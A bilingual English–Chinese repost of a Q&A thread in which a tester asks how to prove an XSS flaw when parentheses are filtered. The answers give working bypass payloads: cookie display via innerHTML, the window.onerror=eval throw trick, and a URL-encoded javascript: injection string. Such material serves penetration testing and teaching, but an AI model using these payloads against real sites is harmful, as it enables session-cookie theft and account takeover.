[英]parentheses alternatives in JS , if any?
I have found that Cross Site Scripting vulnerability in a client's application. 我发现客户端应用程序中存在跨站点脚本漏洞。 The problem is that the vulnerable parameter does not accept parentheses.
问题是易受攻击的参数不接受括号。 So something like
alert(document.cookie)
will be rejected because of parentheses. 因此,由于括号,诸如
alert(document.cookie)
类的东西将被拒绝。 I can get XSS using alert `xss`
but I my client requires a proof of being able to access the DOM. 我可以使用
alert `xss`
来获取XSS,但是我的客户需要能够访问DOM的证明。
In other words, How can I alert(document.cookie)
without parentheses , are there any alternatives? 换句话说,如何在没有括号的情况下
alert(document.cookie)
,是否有其他选择?
Thanks! 谢谢!
document.body.innerHTML=document.cookie
will display the cookies on the page itself. document.body.innerHTML=document.cookie
将在页面本身上显示cookie。
Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. 说到XSS漏洞:是的,它很脆弱,并且禁用括号会迫使攻击者使用更多的创新方法。 Letting someone execute any arbitrary code is a liability.
让别人执行任意代码是一个责任。
Here's a simple example of how you can call any function with any parameters without using any parentheses in your input: 这是一个简单的示例,说明如何在不使用输入括号的情况下使用任何参数调用任何函数:
<p>Malicious input: window.onerror=eval;throw '=1;alert\(document.location\)'</p> <input type="button" onclick="window.onerror=eval;throw '=1;alert\(document.location\)'" value="Click me">
This is another solution that worked for me: 这是另一个对我有用的解决方案:
<script>
var firstname = 'aa';document.location='javascript:alert%28document.cookie%29';//';
</script>
The payload would be: 有效载荷为:
?vulnparam=aa';document.location='javascript:alert%2528document.cookie%2529';//
@tcooc answer is also working. @tcooc答案也有效。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.